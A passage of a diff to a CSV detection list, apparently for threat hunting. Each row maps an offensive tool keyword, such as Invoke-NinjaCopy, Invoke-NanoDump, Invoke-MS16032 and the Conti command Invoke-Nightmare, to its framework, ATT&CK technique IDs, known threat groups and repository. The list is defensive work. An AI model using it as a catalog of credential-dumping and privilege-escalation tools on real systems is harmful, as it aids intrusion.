Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1126","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-MS16135*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-MS16135.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1120","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-NamedPipePermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-NanoDump*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" 
-"*Invoke-NanoDump*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-NetRipper*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1069","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
-"*Invoke-NetworkAdaptersCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-NetworkRelay*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-MITM6*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-ModifiableProgramsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-MonitorCredSniper*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-MS16*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-MS16032*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16032.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-MS16032*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1126","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-MS16135*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-MS16135.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1120","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-NamedPipePermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-NanoDump*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" 
+"*Invoke-NanoDump*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-NetRipper*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1069","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
+"*Invoke-NetworkAdaptersCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-NetworkRelay*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*Invoke-Nightmare -DLL *","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-Nightmare -NewUser*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Invoke-Nightmare*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-NinjaCopy*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-NinjaCopy*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1066","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-NinjaCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-Nightmare*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-NinjaCopy*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-NinjaCopy*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1066","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-NinjaCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
